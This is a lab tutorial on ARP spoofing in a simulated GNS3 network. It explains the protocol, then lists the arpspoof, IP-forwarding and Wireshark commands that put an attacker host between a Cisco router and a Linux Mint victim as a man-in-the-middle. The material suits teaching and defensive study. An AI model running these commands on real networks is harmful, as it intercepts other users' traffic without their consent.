ARP SPOOFING - VBox+GNS3 test

ARP SPOOFING - VBox+GNS3 test

Address Resolution Protocol (ARP) is a protocol used for resolution of network layer addresses (IP address) into link layer addresses (MAC address). ARP was defined by RFC 826 in 1982. It is a request and reply protocol and used only within the boundaries of a single network, never across internetwork nodes.

ARP works on Ethernet networks as follows : 
When any device wishes to send data to another target device over Ethernet, it must first determine the MAC address of that target given its IP address These IP-to-MAC address mappings are derived from an ARP cache maintained on each device. If the given IP address does not appear in a device's cache, that device cannot direct messages to that target until it obtains a new mapping. To do this, the initiating device first sends an ARP request broadcast message on the local subnet. The host with the given IP address sends an ARP reply in response to the broadcat, allowing the initiating device to update its cache and proceed to deliver messages directly to the target. ARP does not provide methods for authenticating ARP replies on a network, ARP replies can come from systems other than the one with the required Layer 2 address.

In ARP spoofing the answering system, or spoofer, replies to a request for another system's address with the aim of intercepting data bound for that system. A malicious user may use ARP spoofing to perform a man-in-the-middle or denial-of-service attack on other users on the network.

Here in this tutorial we are trying a man-in-the-middle attack where we send ARP reply to the router from the attacker stating that it is the victim.Also ARP reply is send to victim stating that the attacker is the router.

Setup a network with at least 2 host connected to a Ethernet switch. This switch is connected to a router. The network I used is shown below.

Network Simulation Software : GNS3

R1 :             Cisco 3620 Router| 192.168.1.1
BT5R2 :          BackTrack 5 R2 | 192.168.1.2 | MAC_ID_1 | Attacker
Mint 12 :             Linux Mint 12  | 192.168.1.3 | MAC_ID_2 | Victim

BT5R2
terminal#1 @ BT5R2
BT5R2# arpspoof -i eth2 -t 192.168.1.1 192.168.1.3 
This sends ARP reply to R1 stating that BT5R2 is 192.168.1.3
so R1 saves MAC_ID_1 as the MAC ID of 192.168.1.3
This is reply is send regularly so dont close this process

terminal#2 @ BT5R2
BT5R2# arpspoof -i eth2 -t 192.168.1.3 192.168.1.1
This sends ARP reply to Mint 12 stating that BT5R2 is 192.168.1.1
so Mint 12 saves MAC_ID_1 as the MAC ID of 192.168.1.1
This is reply is send regularly so dont close this process

terminal#3 @ BT5R2
BT5R2# echo 1 > /proc/sys/net/ipv4/ip_forward
Enable IP forwarding
BT5R2# wireshark & 
So that you can capture the packets for verification


Mint 12
Mint12# ping 192.168.1.1
ping R1, check wireshark @ BT5R2 for 'Redirect' packets.
Those packets will be highlighted in Black.

R1
To check R1 ARP mapping 
R1#show arp